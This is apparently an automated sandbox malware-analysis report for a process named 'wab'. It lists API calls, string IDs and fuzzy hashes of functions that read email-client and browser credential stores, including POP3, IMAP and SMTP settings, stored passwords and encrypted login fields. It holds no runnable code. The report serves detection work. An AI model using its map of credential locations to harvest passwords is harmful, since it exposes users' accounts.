                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                • String ID: E$ E$ E
                                                                                                                                                • API String ID: 1865533344-1090515111
                                                                                                                                                • Opcode ID: 9da058ee93427dafffafa38840fabb32167184d36f2f077627326be0874b02b0
                                                                                                                                                • Instruction ID: 87a0be596659d04b7e64c8373dbe8b7d58709088cb568d7826d55e868489c559
                                                                                                                                                • Opcode Fuzzy Hash: 9da058ee93427dafffafa38840fabb32167184d36f2f077627326be0874b02b0
                                                                                                                                                • Instruction Fuzzy Hash: 0E115A74900209EFCF119F90C905AAE3BB1AF08312F00806AFC156B2A2C7799911DFAA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • strlen.MSVCRT ref: 0044269A
                                                                                                                                                • _strncoll.MSVCRT ref: 004426AA
                                                                                                                                                • memcpy.MSVCRT ref: 00442726
                                                                                                                                                • atoi.MSVCRT ref: 00442737
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00442763
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
                                                                                                                                                • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                • API String ID: 1864335961-3210201812
                                                                                                                                                • Opcode ID: 80ec9a29ea78ec2cbe9852ea9064bf10950e9091ede64f5a1b804a11a303e8fe
                                                                                                                                                • Instruction ID: 53082eb74af2b51306e1b07bdc149dea26fd0daa9c3b29582cc647e8b6ddbc01
                                                                                                                                                • Opcode Fuzzy Hash: 80ec9a29ea78ec2cbe9852ea9064bf10950e9091ede64f5a1b804a11a303e8fe
                                                                                                                                                • Instruction Fuzzy Hash: 90F112B080625CDBFB61CF54D9897DEBBB0EB01308F5881CAD4597B251C7B81A89CF99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                • API String ID: 1714764973-479759155
                                                                                                                                                • Opcode ID: a22eaacac348120a4584acb678e178257747be7cf0bf62b2cbe4dd5676c6cf3b
                                                                                                                                                • Instruction ID: 5e0940cb4a553810ccd5eed58eee7b2aa7af7a3cc246567a3fd24b3687d2e464
                                                                                                                                                • Opcode Fuzzy Hash: a22eaacac348120a4584acb678e178257747be7cf0bf62b2cbe4dd5676c6cf3b
                                                                                                                                                • Instruction Fuzzy Hash: AD9191B260C7049AF628BB329D43B9B33D8AF50719F10043FF95AB61C2EE6DB905465D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040E6BB
                                                                                                                                                  • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                                                                                                                                  • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                                                                                                                                  • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                                                                                                                                • memset.MSVCRT ref: 0040E70C
                                                                                                                                                • memset.MSVCRT ref: 0040E728
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,%@,000000FF,?,00000104,?,?,?,?,?,?,0040EC25,?,00000000), ref: 0040E73F
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040EC25,?), ref: 0040E75E
                                                                                                                                                • memset.MSVCRT ref: 0040E7C0
                                                                                                                                                • memset.MSVCRT ref: 0040E7D5
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040E83A
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040E850
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040E866
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040E87C
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040E892
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040E8A8
                                                                                                                                                • memset.MSVCRT ref: 0040E8C2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                • String ID: $"$$$$$%@$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                • API String ID: 3137614212-1813914204
                                                                                                                                                • Opcode ID: 69a064d0c74a5f80a32c9514a74247ccae5cfcd5772a3df6081ef2e910daae95
                                                                                                                                                • Instruction ID: 60cbd65c12865ccb94f157c96bc1922d811664869268201cbad442dfa9876f55
                                                                                                                                                • Opcode Fuzzy Hash: 69a064d0c74a5f80a32c9514a74247ccae5cfcd5772a3df6081ef2e910daae95
                                                                                                                                                • Instruction Fuzzy Hash: A9228E218087DA9DDB31D6BC9C456CDBF646B16234F0803DAF1E8BB2D2D7344A46CB66
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strcmpi$strlen$_strncoll$atoimemset$memcpy
                                                                                                                                                • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                                                                                                                • API String ID: 594115653-593045482
                                                                                                                                                • Opcode ID: 02ac693aacd5f103a4b76259fedb339b3b15ca4c55630f2bd5c8a753d7842cac
                                                                                                                                                • Instruction ID: 1e907043fac54bf2e371806c1eb24ba38ca233ac5dd260cadef0f6990961d541
                                                                                                                                                • Opcode Fuzzy Hash: 02ac693aacd5f103a4b76259fedb339b3b15ca4c55630f2bd5c8a753d7842cac
                                                                                                                                                • Instruction Fuzzy Hash: 3C71D832804204AEFF14ABA1DD02B9E77B5DF91329F21406FF545B21C1EB7D9A18D64C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                                                                                                                                  • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                                                                                                                                  • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                                                                                                                                  • Part of subcall function 004086A5: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                                                                                                                                  • Part of subcall function 004086A5: CloseHandle.KERNEL32(?,?), ref: 0040870D
                                                                                                                                                  • Part of subcall function 00408763: _mbsicmp.MSVCRT ref: 0040879D
                                                                                                                                                • memset.MSVCRT ref: 0040E123
                                                                                                                                                • memset.MSVCRT ref: 0040E138
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040E19F
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040E1B5
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040E1CB
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040E1E1
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040E1F7
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040E20A
                                                                                                                                                • memset.MSVCRT ref: 0040E225
                                                                                                                                                • memset.MSVCRT ref: 0040E23C
                                                                                                                                                  • Part of subcall function 00406582: memset.MSVCRT ref: 004065A3
                                                                                                                                                  • Part of subcall function 00406582: memcmp.MSVCRT ref: 004065CD
                                                                                                                                                • memset.MSVCRT ref: 0040E29D
                                                                                                                                                • memset.MSVCRT ref: 0040E2B4
                                                                                                                                                • memset.MSVCRT ref: 0040E2CB
                                                                                                                                                • sprintf.MSVCRT ref: 0040E2E6
                                                                                                                                                • sprintf.MSVCRT ref: 0040E2FB
                                                                                                                                                • sprintf.MSVCRT ref: 0040E310
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E326
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E33F
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E358
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E374
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                • String ID: C@$encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                • API String ID: 4171719235-3249434271
                                                                                                                                                • Opcode ID: b0d5c0670ed8c74d0c8e3b60901706fc2ec35adaa3e3620046f1bbd10783a5e2
                                                                                                                                                • Instruction ID: 4eb083177fa9c3dcba641838e0e399a852ec85db15ddf69852980c8670b79128
                                                                                                                                                • Opcode Fuzzy Hash: b0d5c0670ed8c74d0c8e3b60901706fc2ec35adaa3e3620046f1bbd10783a5e2
                                                                                                                                                • Instruction Fuzzy Hash: EFA16672D04219AEDF10EBA1DC41ADE77BCAF44304F1044BFF645B7181DA38AA988F59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0040FDA3
                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040FDAF
                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 0040FDBE
                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 0040FDCA
                                                                                                                                                • GetWindowLongA.USER32(00000000,000000EC), ref: 0040FDD3
                                                                                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0040FDDF
                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0040FDF1
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040FDFC
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE10
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE1E
                                                                                                                                                • GetDC.USER32 ref: 0040FE57
                                                                                                                                                • strlen.MSVCRT ref: 0040FE97
                                                                                                                                                • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 0040FEA8
                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 0040FEF5
                                                                                                                                                • sprintf.MSVCRT ref: 0040FFB5
                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 0040FFC9
                                                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 0040FFE7
                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 0041001D
                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041002D
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041003B
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00410052
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041005C
                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 004100A2
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004100AC
                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 004100E4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                                                • API String ID: 1703216249-3046471546
                                                                                                                                                • Opcode ID: 8a60e0ba97f171743a829e93ce0ff1a0e7cc565a63bc43af7584db32dade8b22
                                                                                                                                                • Instruction ID: 60093129ffb9b10d71bc98ba01756b195f92c815bd96d79b3314cc8c80e42073
                                                                                                                                                • Opcode Fuzzy Hash: 8a60e0ba97f171743a829e93ce0ff1a0e7cc565a63bc43af7584db32dade8b22
                                                                                                                                                • Instruction Fuzzy Hash: 62B1DE71108741AFDB20DF68C985E6BBBE9FF88704F00492EF69992261DB75E804CF56
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004024E7
                                                                                                                                                  • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                • _mbscpy.MSVCRT ref: 00402525
                                                                                                                                                • _mbscpy.MSVCRT ref: 004025EF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy$QueryValuememset
                                                                                                                                                • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                • API String ID: 168965057-606283353
                                                                                                                                                • Opcode ID: d04dcaea7970b63fee6828c7dcfe30098fc49b177350675b76886810d8c329c2
                                                                                                                                                • Instruction ID: 01ace8319ffdb9fe87aab8cc910760b0be55d28e69d7af66dfccc1b3ad16f9ad
                                                                                                                                                • Opcode Fuzzy Hash: d04dcaea7970b63fee6828c7dcfe30098fc49b177350675b76886810d8c329c2
                                                                                                                                                • Instruction Fuzzy Hash: 815163B540161CEBEF20DF91DC85ADD7BACAF04318F50846BFA08A6142D7BD9584CF98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040285B
                                                                                                                                                  • Part of subcall function 00402994: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029C5
                                                                                                                                                • _mbscpy.MSVCRT ref: 00402895
                                                                                                                                                  • Part of subcall function 00402994: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029F3
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040296D
                                                                                                                                                  • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                • API String ID: 1497257669-167382505
                                                                                                                                                • Opcode ID: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
                                                                                                                                                • Instruction ID: 24fe9e335227be75b4da69fc4be99485a809f42695e36ab36f90f83f1315ab2f
                                                                                                                                                • Opcode Fuzzy Hash: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
                                                                                                                                                • Instruction Fuzzy Hash: 22514DB150060C9BEF25EF61DC85ADD7BA8FF04308F50802BF924661A2DBB99958CF48
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • EndDialog.USER32(?,?), ref: 0040F600
                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0040F618
                                                                                                                                                • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040F637
                                                                                                                                                • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040F644
                                                                                                                                                • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040F64D
                                                                                                                                                • memset.MSVCRT ref: 0040F675
                                                                                                                                                • memset.MSVCRT ref: 0040F695
                                                                                                                                                • memset.MSVCRT ref: 0040F6B3
                                                                                                                                                • memset.MSVCRT ref: 0040F6CC
                                                                                                                                                • memset.MSVCRT ref: 0040F6EA
                                                                                                                                                • memset.MSVCRT ref: 0040F703
                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0040F70B
                                                                                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040F730
                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040F766
                                                                                                                                                • memset.MSVCRT ref: 0040F7BD
                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040F7CB
                                                                                                                                                • memcpy.MSVCRT ref: 0040F7FA
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040F81C
                                                                                                                                                • sprintf.MSVCRT ref: 0040F887
                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040F8A0
                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0040F8AA
                                                                                                                                                • SetFocus.USER32(00000000), ref: 0040F8B1
                                                                                                                                                Strings
                                                                                                                                                • {Unknown}, xrefs: 0040F67A
                                                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040F881
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                • API String ID: 1428123949-3474136107
                                                                                                                                                • Opcode ID: b9341adbc2cd016ad37feae7563ea95aa4c33f034ac246c3141dbd5b744c5ef9
                                                                                                                                                • Instruction ID: eaf6f4841f79e9ca67ab0c8a61f7093b44a411cbafad24e33deb6097971d8b5c
                                                                                                                                                • Opcode Fuzzy Hash: b9341adbc2cd016ad37feae7563ea95aa4c33f034ac246c3141dbd5b744c5ef9
                                                                                                                                                • Instruction Fuzzy Hash: 4271B576404344BFEB31ABA0DC41EDB7B9CFB94345F00443AF644A25A1DB399D18CB6A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EE,00451398), ref: 00401273
                                                                                                                                                • memset.MSVCRT ref: 0040128E
                                                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2998058495-0
                                                                                                                                                • Opcode ID: 0f9c4242ba45eb06dd3dfa1dd6db45fade88f32ef90b46f4d12f3d9a9e08a6d1
                                                                                                                                                • Instruction ID: cf74e5707885198988a29297af0a26d915b41f86d4ff93bb74c60bb1bb3fb963
                                                                                                                                                • Opcode Fuzzy Hash: 0f9c4242ba45eb06dd3dfa1dd6db45fade88f32ef90b46f4d12f3d9a9e08a6d1
                                                                                                                                                • Instruction Fuzzy Hash: 04618B35800208EBDF12AFA0DD85BAE7FA5BB04305F1481B6F904BA2F2C7B59950DF58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00408DE1: LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                  • Part of subcall function 00408DE1: sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 0040BA7E
                                                                                                                                                • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BAB1
                                                                                                                                                • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BAC7
                                                                                                                                                • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BB27
                                                                                                                                                • LoadIconA.USER32(00000066,00000000), ref: 0040BB96
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040BBEE
                                                                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,0044551F), ref: 0040BC03
                                                                                                                                                • SetFocus.USER32(?), ref: 0040BC29
                                                                                                                                                • GetFileAttributesA.KERNEL32(004518C0), ref: 0040BC42
                                                                                                                                                • GetTempPathA.KERNEL32(00000104,004518C0), ref: 0040BC52
                                                                                                                                                • strlen.MSVCRT ref: 0040BC59
                                                                                                                                                • strlen.MSVCRT ref: 0040BC67
                                                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BCC3
                                                                                                                                                  • Part of subcall function 00404B82: strlen.MSVCRT ref: 00404B9F
                                                                                                                                                  • Part of subcall function 00404B82: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404BC3
                                                                                                                                                • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BD0E
                                                                                                                                                • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BD21
                                                                                                                                                • memset.MSVCRT ref: 0040BD36
                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 0040BD5A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                • API String ID: 2303586283-933021314
                                                                                                                                                • Opcode ID: bc2ea265da4b9d7fbf42eb82516b20c9e5d99f5c25abf20ff2f7a7fba55c6b61
                                                                                                                                                • Instruction ID: a3034197930a53117d85b49231bdaaa03d04473d70278c5121b5a691f959c143
                                                                                                                                                • Opcode Fuzzy Hash: bc2ea265da4b9d7fbf42eb82516b20c9e5d99f5c25abf20ff2f7a7fba55c6b61
                                                                                                                                                • Instruction Fuzzy Hash: 13C1E0B1644788FFEB16DF64CC45BDABBA5FF14304F00016AFA44AB292C7B59904CB99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                • API String ID: 633282248-1996832678
                                                                                                                                                • Opcode ID: d48ae4295fbb277336b7674ab4026529653ef1736987acc8de4e4bffa9c8da66
                                                                                                                                                • Instruction ID: 7c6bf41bc1280a1bc88d4c6d4cc59bc6a86d5934fc3475aca932ea250c86fdc0
                                                                                                                                                • Opcode Fuzzy Hash: d48ae4295fbb277336b7674ab4026529653ef1736987acc8de4e4bffa9c8da66
